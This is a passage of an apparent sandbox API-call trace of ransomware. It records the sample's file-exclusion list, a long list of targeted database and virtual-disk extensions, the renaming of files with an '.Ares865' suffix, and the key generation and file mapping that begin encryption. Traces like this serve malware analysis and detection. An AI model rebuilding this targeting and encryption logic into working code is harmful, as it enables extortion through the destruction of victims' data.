lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.763] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0063.763] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0063.763] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0063.763] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x650f7e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x650f7e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2f2de8d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x200000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="edb00001.log", cAlternateFileName="")) returned 1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="aoldtz.exe") returned 1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2=".") returned 1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="..") returned 1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="windows") returned -1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="bootmgr") returned 1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="temp") returned -1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="pagefile.sys") returned -1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="boot") returned 1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="ids.txt") returned -1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="ntuser.dat") returned -1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="perflogs") returned -1 [0063.763] lstrcmpiW (lpString1="edb00001.log", lpString2="MSBuild") returned -1 [0063.763] lstrlenW (lpString="edb00001.log") returned 12 [0063.763] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\*") returned 72 [0063.764] lstrcpyW (in: lpString1=0x2cce48e, lpString2="edb00001.log" | out: lpString1="edb00001.log") returned="edb00001.log" [0063.764] lstrlenW (lpString="edb00001.log") returned 12 [0063.764] lstrlenW (lpString="Ares865") returned 7 [0063.764] lstrcmpiW (lpString1="001.log", lpString2="Ares865") returned -1 [0063.764] lstrlenW (lpString=".dll") returned 4 [0063.764] lstrcmpiW (lpString1="edb00001.log", lpString2=".dll") returned 1 [0063.764] lstrlenW (lpString=".lnk") returned 4 [0063.764] lstrcmpiW (lpString1="edb00001.log", lpString2=".lnk") returned 1 [0063.764] lstrlenW (lpString=".ini") returned 4 [0063.764] lstrcmpiW (lpString1="edb00001.log", lpString2=".ini") returned 1 [0063.764] lstrlenW (lpString=".sys") returned 4 [0063.764] lstrcmpiW (lpString1="edb00001.log", lpString2=".sys") returned 1 [0063.764] lstrlenW (lpString="edb00001.log") returned 12 [0063.764] lstrlenW (lpString="bak") returned 3 [0063.764] lstrcmpiW (lpString1="log", lpString2="bak") returned 1 [0063.764] lstrlenW (lpString="ba_") returned 3 [0063.764] lstrcmpiW (lpString1="log", lpString2="ba_") returned 1 [0063.764] lstrlenW (lpString="dbb") returned 3 [0063.764] lstrcmpiW (lpString1="log", lpString2="dbb") returned 1 [0063.764] lstrlenW (lpString="vmdk") returned 4 [0063.764] lstrcmpiW (lpString1=".log", lpString2="vmdk") returned -1 [0063.764] lstrlenW (lpString="rar") returned 3 [0063.764] lstrcmpiW (lpString1="log", lpString2="rar") returned -1 [0063.764] lstrlenW (lpString="zip") returned 3 [0063.764] lstrcmpiW (lpString1="log", lpString2="zip") returned -1 [0063.764] lstrlenW (lpString="tgz") returned 3 [0063.764] lstrcmpiW (lpString1="log", lpString2="tgz") returned -1 [0063.764] lstrlenW (lpString="vbox") returned 4 [0063.764] lstrcmpiW (lpString1=".log", lpString2="vbox") returned -1 [0063.764] lstrlenW (lpString="vdi") returned 3 [0063.764] lstrcmpiW (lpString1="log", lpString2="vdi") returned -1 [0063.764] lstrlenW (lpString="vhd") returned 3 [0063.764] lstrcmpiW (lpString1="log", lpString2="vhd") returned -1 [0063.764] lstrlenW (lpString="vhdx") returned 4 [0063.764] lstrcmpiW (lpString1=".log", lpString2="vhdx") returned -1 [0063.764] lstrlenW (lpString="avhd") returned 4 [0063.764] lstrcmpiW (lpString1=".log", lpString2="avhd") returned -1 [0063.764] lstrlenW (lpString="db") returned 2 [0063.765] lstrcmpiW (lpString1="og", lpString2="db") returned 1 [0063.765] lstrlenW (lpString="db2") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="db2") returned 1 [0063.765] lstrlenW (lpString="db3") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="db3") returned 1 [0063.765] lstrlenW (lpString="dbf") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="dbf") returned 1 [0063.765] lstrlenW (lpString="mdf") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="mdf") returned -1 [0063.765] lstrlenW (lpString="mdb") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="mdb") returned -1 [0063.765] lstrlenW (lpString="sql") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="sql") returned -1 [0063.765] lstrlenW (lpString="sqlite") returned 6 [0063.765] lstrcmpiW (lpString1="01.log", lpString2="sqlite") returned -1 [0063.765] lstrlenW (lpString="sqlite3") returned 7 [0063.765] lstrcmpiW (lpString1="001.log", lpString2="sqlite3") returned -1 [0063.765] lstrlenW (lpString="sqlitedb") returned 8 [0063.765] lstrcmpiW (lpString1="0001.log", lpString2="sqlitedb") returned -1 [0063.765] lstrlenW (lpString="xml") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="xml") returned -1 [0063.765] lstrlenW (lpString="$er") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="$er") returned 1 [0063.765] lstrlenW (lpString="4dd") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="4dd") returned 1 [0063.765] lstrlenW (lpString="4dl") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="4dl") returned 1 [0063.765] lstrlenW (lpString="^^^") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="^^^") returned 1 [0063.765] lstrlenW (lpString="abs") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="abs") returned 1 [0063.765] lstrlenW (lpString="abx") returned 3 [0063.765] lstrcmpiW (lpString1="log", lpString2="abx") returned 1 [0063.765] lstrlenW (lpString="accdb") returned 5 [0063.765] lstrcmpiW (lpString1="1.log", lpString2="accdb") returned -1 [0063.765] lstrlenW (lpString="accdc") returned 5 [0063.765] lstrcmpiW (lpString1="1.log", lpString2="accdc") returned -1 [0063.765] lstrlenW (lpString="accde") returned 5 [0063.766] lstrcmpiW (lpString1="1.log", lpString2="accde") returned -1 [0063.766] lstrlenW (lpString="accdr") returned 5 [0063.766] lstrcmpiW (lpString1="1.log", lpString2="accdr") returned -1 [0063.766] lstrlenW (lpString="accdt") returned 5 [0063.766] lstrcmpiW (lpString1="1.log", lpString2="accdt") returned -1 [0063.766] lstrlenW (lpString="accdw") returned 5 [0063.766] lstrcmpiW (lpString1="1.log", lpString2="accdw") returned -1 [0063.766] lstrlenW (lpString="accft") returned 5 [0063.766] lstrcmpiW (lpString1="1.log", lpString2="accft") returned -1 [0063.766] lstrlenW (lpString="adb") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="adb") returned 1 [0063.766] lstrlenW (lpString="adb") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="adb") returned 1 [0063.766] lstrlenW (lpString="ade") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="ade") returned 1 [0063.766] lstrlenW (lpString="adf") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="adf") returned 1 [0063.766] lstrlenW (lpString="adn") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="adn") returned 1 [0063.766] lstrlenW (lpString="adp") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="adp") returned 1 [0063.766] lstrlenW (lpString="alf") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="alf") returned 1 [0063.766] lstrlenW (lpString="ask") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="ask") returned 1 [0063.766] lstrlenW (lpString="btr") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="btr") returned 1 [0063.766] lstrlenW (lpString="cat") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="cat") returned 1 [0063.766] lstrlenW (lpString="cdb") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="cdb") returned 1 [0063.766] lstrlenW (lpString="ckp") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="ckp") returned 1 [0063.766] lstrlenW (lpString="cma") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="cma") returned 1 [0063.766] lstrlenW (lpString="cpd") returned 3 [0063.766] lstrcmpiW (lpString1="log", lpString2="cpd") returned 1 [0063.767] lstrlenW (lpString="dacpac") returned 6 [0063.767] lstrcmpiW (lpString1="01.log", lpString2="dacpac") returned -1 [0063.767] lstrlenW (lpString="dad") returned 3 [0063.767] lstrcmpiW (lpString1="log", lpString2="dad") returned 1 [0063.767] lstrlenW (lpString="dadiagrams") returned 10 [0063.767] lstrcmpiW (lpString1="b00001.log", lpString2="dadiagrams") returned -1 [0063.767] lstrlenW (lpString="daschema") returned 8 [0063.767] lstrcmpiW (lpString1="0001.log", lpString2="daschema") returned -1 [0063.767] lstrlenW (lpString="db-journal") returned 10 [0063.767] lstrcmpiW (lpString1="b00001.log", lpString2="db-journal") returned -1 [0063.767] lstrlenW (lpString="db-shm") returned 6 [0063.767] lstrcmpiW (lpString1="01.log", lpString2="db-shm") returned -1 [0063.767] lstrlenW (lpString="db-wal") returned 6 [0063.767] lstrcmpiW (lpString1="01.log", lpString2="db-wal") returned -1 [0063.767] lstrlenW (lpString="dbc") returned 3 [0063.767] lstrcmpiW (lpString1="log", lpString2="dbc") returned 1 [0063.767] lstrlenW (lpString="dbs") returned 3 [0063.767] lstrcmpiW (lpString1="log", lpString2="dbs") returned 1 [0063.767] lstrlenW (lpString="dbt") returned 3 [0063.767] lstrcmpiW (lpString1="log", lpString2="dbt") returned 1 [0063.767] lstrlenW (lpString="dbv") returned 3 [0063.767] lstrcmpiW (lpString1="log", lpString2="dbv") returned 1 [0063.767] lstrlenW (lpString="dbx") returned 3 [0063.767] lstrcmpiW (lpString1="log", lpString2="dbx") returned 1 [0063.767] lstrlenW (lpString="dcb") returned 3 [0063.767] lstrcmpiW (lpString1="log", lpString2="dcb") returned 1 [0063.767] lstrlenW (lpString="dct") returned 3 [0063.767] lstrcmpiW (lpString1="log", lpString2="dct") returned 1 [0063.767] lstrlenW (lpString="dcx") returned 3 [0063.767] lstrcmpiW (lpString1="log", lpString2="dcx") returned 1 [0063.767] lstrlenW (lpString="ddl") returned 3 [0063.767] lstrcmpiW (lpString1="log", lpString2="ddl") returned 1 [0063.767] lstrlenW (lpString="dlis") returned 4 [0063.768] lstrcmpiW (lpString1=".log", lpString2="dlis") returned -1 [0063.768] lstrlenW (lpString="dp1") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="dp1") returned 1 [0063.768] lstrlenW (lpString="dqy") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="dqy") returned 1 [0063.768] lstrlenW (lpString="dsk") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="dsk") returned 1 [0063.768] lstrlenW (lpString="dsn") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="dsn") returned 1 [0063.768] lstrlenW (lpString="dtsx") returned 4 [0063.768] lstrcmpiW (lpString1=".log", lpString2="dtsx") returned -1 [0063.768] lstrlenW (lpString="dxl") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="dxl") returned 1 [0063.768] lstrlenW (lpString="eco") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="eco") returned 1 [0063.768] lstrlenW (lpString="ecx") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="ecx") returned 1 [0063.768] lstrlenW (lpString="edb") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="edb") returned 1 [0063.768] lstrlenW (lpString="epim") returned 4 [0063.768] lstrcmpiW (lpString1=".log", lpString2="epim") returned -1 [0063.768] lstrlenW (lpString="fcd") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="fcd") returned 1 [0063.768] lstrlenW (lpString="fdb") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="fdb") returned 1 [0063.768] lstrlenW (lpString="fic") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="fic") returned 1 [0063.768] lstrlenW (lpString="flexolibrary") returned 12 [0063.768] lstrlenW (lpString="fm5") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="fm5") returned 1 [0063.768] lstrlenW (lpString="fmp") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="fmp") returned 1 [0063.768] lstrlenW (lpString="fmp12") returned 5 [0063.768] lstrcmpiW (lpString1="1.log", lpString2="fmp12") returned -1 [0063.768] lstrlenW (lpString="fmpsl") returned 5 [0063.768] lstrcmpiW (lpString1="1.log", lpString2="fmpsl") returned -1 [0063.768] lstrlenW (lpString="fol") returned 3 [0063.768] lstrcmpiW (lpString1="log", lpString2="fol") returned 1 [0063.768] lstrlenW (lpString="fp3") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="fp3") returned 1 [0063.769] lstrlenW (lpString="fp4") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="fp4") returned 1 [0063.769] lstrlenW (lpString="fp5") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="fp5") returned 1 [0063.769] lstrlenW (lpString="fp7") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="fp7") returned 1 [0063.769] lstrlenW (lpString="fpt") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="fpt") returned 1 [0063.769] lstrlenW (lpString="frm") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="frm") returned 1 [0063.769] lstrlenW (lpString="gdb") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="gdb") returned 1 [0063.769] lstrlenW (lpString="gdb") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="gdb") returned 1 [0063.769] lstrlenW (lpString="grdb") returned 4 [0063.769] lstrcmpiW (lpString1=".log", lpString2="grdb") returned -1 [0063.769] lstrlenW (lpString="gwi") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="gwi") returned 1 [0063.769] lstrlenW (lpString="hdb") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="hdb") returned 1 [0063.769] lstrlenW (lpString="his") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="his") returned 1 [0063.769] lstrlenW (lpString="ib") returned 2 [0063.769] lstrcmpiW (lpString1="og", lpString2="ib") returned 1 [0063.769] lstrlenW (lpString="idb") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="idb") returned 1 [0063.769] lstrlenW (lpString="ihx") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="ihx") returned 1 [0063.769] lstrlenW (lpString="itdb") returned 4 [0063.769] lstrcmpiW (lpString1=".log", lpString2="itdb") returned -1 [0063.769] lstrlenW (lpString="itw") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="itw") returned 1 [0063.769] lstrlenW (lpString="jet") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="jet") returned 1 [0063.769] lstrlenW (lpString="jtx") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="jtx") returned 1 [0063.769] lstrlenW (lpString="kdb") returned 3 [0063.769] lstrcmpiW (lpString1="log", lpString2="kdb") returned 1 [0063.770] lstrlenW (lpString="kexi") returned 4 [0063.770] lstrcmpiW (lpString1=".log", lpString2="kexi") returned -1 [0063.770] lstrlenW (lpString="kexic") returned 5 [0063.770] lstrcmpiW (lpString1="1.log", lpString2="kexic") returned -1 [0063.770] lstrlenW (lpString="kexis") returned 5 [0063.770] lstrcmpiW (lpString1="1.log", lpString2="kexis") returned -1 [0063.770] lstrlenW (lpString="lgc") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="lgc") returned 1 [0063.770] lstrlenW (lpString="lwx") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="lwx") returned -1 [0063.770] lstrlenW (lpString="maf") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="maf") returned -1 [0063.770] lstrlenW (lpString="maq") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="maq") returned -1 [0063.770] lstrlenW (lpString="mar") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="mar") returned -1 [0063.770] lstrlenW (lpString="marshal") returned 7 [0063.770] lstrcmpiW (lpString1="001.log", lpString2="marshal") returned -1 [0063.770] lstrlenW (lpString="mas") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="mas") returned -1 [0063.770] lstrlenW (lpString="mav") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="mav") returned -1 [0063.770] lstrlenW (lpString="maw") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="maw") returned -1 [0063.770] lstrlenW (lpString="mdbhtml") returned 7 [0063.770] lstrcmpiW (lpString1="001.log", lpString2="mdbhtml") returned -1 [0063.770] lstrlenW (lpString="mdn") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="mdn") returned -1 [0063.770] lstrlenW (lpString="mdt") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="mdt") returned -1 [0063.770] lstrlenW (lpString="mfd") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="mfd") returned -1 [0063.770] lstrlenW (lpString="mpd") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="mpd") returned -1 [0063.770] lstrlenW (lpString="mrg") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="mrg") returned -1 [0063.770] lstrlenW (lpString="mud") returned 3 [0063.770] lstrcmpiW (lpString1="log", lpString2="mud") returned -1 [0063.771] lstrlenW (lpString="mwb") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="mwb") returned -1 [0063.771] lstrlenW (lpString="myd") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="myd") returned -1 [0063.771] lstrlenW (lpString="ndf") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="ndf") returned -1 [0063.771] lstrlenW (lpString="nnt") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="nnt") returned -1 [0063.771] lstrlenW (lpString="nrmlib") returned 6 [0063.771] lstrcmpiW (lpString1="01.log", lpString2="nrmlib") returned -1 [0063.771] lstrlenW (lpString="ns2") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="ns2") returned -1 [0063.771] lstrlenW (lpString="ns3") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="ns3") returned -1 [0063.771] lstrlenW (lpString="ns4") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="ns4") returned -1 [0063.771] lstrlenW (lpString="nsf") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="nsf") returned -1 [0063.771] lstrlenW (lpString="nv") returned 2 [0063.771] lstrcmpiW (lpString1="og", lpString2="nv") returned 1 [0063.771] lstrlenW (lpString="nv2") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="nv2") returned -1 [0063.771] lstrlenW (lpString="nwdb") returned 4 [0063.771] lstrcmpiW (lpString1=".log", lpString2="nwdb") returned -1 [0063.771] lstrlenW (lpString="nyf") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="nyf") returned -1 [0063.771] lstrlenW (lpString="odb") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="odb") returned -1 [0063.771] lstrlenW (lpString="odb") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="odb") returned -1 [0063.771] lstrlenW (lpString="oqy") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="oqy") returned -1 [0063.771] lstrlenW (lpString="ora") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="ora") returned -1 [0063.771] lstrlenW (lpString="orx") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="orx") returned -1 [0063.771] lstrlenW (lpString="owc") returned 3 [0063.771] lstrcmpiW (lpString1="log", lpString2="owc") returned -1 [0063.772] lstrlenW (lpString="p96") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="p96") returned -1 [0063.772] lstrlenW (lpString="p97") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="p97") returned -1 [0063.772] lstrlenW (lpString="pan") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="pan") returned -1 [0063.772] lstrlenW (lpString="pdb") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="pdb") returned -1 [0063.772] lstrlenW (lpString="pdm") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="pdm") returned -1 [0063.772] lstrlenW (lpString="pnz") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="pnz") returned -1 [0063.772] lstrlenW (lpString="qry") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="qry") returned -1 [0063.772] lstrlenW (lpString="qvd") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="qvd") returned -1 [0063.772] lstrlenW (lpString="rbf") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="rbf") returned -1 [0063.772] lstrlenW (lpString="rctd") returned 4 [0063.772] lstrcmpiW (lpString1=".log", lpString2="rctd") returned -1 [0063.772] lstrlenW (lpString="rod") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="rod") returned -1 [0063.772] lstrlenW (lpString="rodx") returned 4 [0063.772] lstrcmpiW (lpString1=".log", lpString2="rodx") returned -1 [0063.772] lstrlenW (lpString="rpd") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="rpd") returned -1 [0063.772] lstrlenW (lpString="rsd") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="rsd") returned -1 [0063.772] lstrlenW (lpString="sas7bdat") returned 8 [0063.772] lstrcmpiW (lpString1="0001.log", lpString2="sas7bdat") returned -1 [0063.772] lstrlenW (lpString="sbf") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="sbf") returned -1 [0063.772] lstrlenW (lpString="scx") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="scx") returned -1 [0063.772] lstrlenW (lpString="sdb") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="sdb") returned -1 [0063.772] lstrlenW (lpString="sdc") returned 3 [0063.772] lstrcmpiW (lpString1="log", lpString2="sdc") returned -1 [0063.773] lstrlenW (lpString="sdf") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="sdf") returned -1 [0063.773] lstrlenW (lpString="sis") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="sis") returned -1 [0063.773] lstrlenW (lpString="spq") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="spq") returned -1 [0063.773] lstrlenW (lpString="te") returned 2 [0063.773] lstrcmpiW (lpString1="og", lpString2="te") returned -1 [0063.773] lstrlenW (lpString="teacher") returned 7 [0063.773] lstrcmpiW (lpString1="001.log", lpString2="teacher") returned -1 [0063.773] lstrlenW (lpString="tmd") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="tmd") returned -1 [0063.773] lstrlenW (lpString="tps") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="tps") returned -1 [0063.773] lstrlenW (lpString="trc") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="trc") returned -1 [0063.773] lstrlenW (lpString="trc") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="trc") returned -1 [0063.773] lstrlenW (lpString="trm") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="trm") returned -1 [0063.773] lstrlenW (lpString="udb") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="udb") returned -1 [0063.773] lstrlenW (lpString="udl") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="udl") returned -1 [0063.773] lstrlenW (lpString="usr") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="usr") returned -1 [0063.773] lstrlenW (lpString="v12") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="v12") returned -1 [0063.773] lstrlenW (lpString="vis") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="vis") returned -1 [0063.773] lstrlenW (lpString="vpd") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="vpd") returned -1 [0063.773] lstrlenW (lpString="vvv") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="vvv") returned -1 [0063.773] lstrlenW (lpString="wdb") returned 3 [0063.773] lstrcmpiW (lpString1="log", lpString2="wdb") returned -1 [0063.773] lstrlenW (lpString="wmdb") returned 4 [0063.773] lstrcmpiW (lpString1=".log", lpString2="wmdb") returned -1 [0063.774] lstrlenW (lpString="wrk") returned 3 [0063.774] lstrcmpiW (lpString1="log", lpString2="wrk") returned -1 [0063.774] lstrlenW (lpString="xdb") returned 3 [0063.774] lstrcmpiW (lpString1="log", lpString2="xdb") returned -1 [0063.774] lstrlenW (lpString="xld") returned 3 [0063.774] lstrcmpiW (lpString1="log", lpString2="xld") returned -1 [0063.774] lstrlenW (lpString="xmlff") returned 5 [0063.774] lstrcmpiW (lpString1="1.log", lpString2="xmlff") returned -1 [0063.774] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.Ares865") returned 91 [0063.774] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\edb00001.log"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\edb00001.log.ares865"), dwFlags=0x1) returned 1 [0063.774] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\edb00001.log.Ares865" (normalized: "c:\\users\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\edb00001.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x154 [0063.775] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2097152) returned 1 [0063.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0063.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0063.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2effc8 [0063.775] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0063.776] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0063.776] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0063.776] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x200300, lpName=0x0) returned 0x164 [0063.777] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x200000, dwNumberOfBytesToMap=0x300) returned 0x190000 [0063.777] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3450000 [0064.225] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f00d8) returned 1 [0064.231] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0064.231] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0064.231] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0064.231] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0064.231] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0064.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0064.232] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0064.232] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0064.232] RtlAllocateHeap 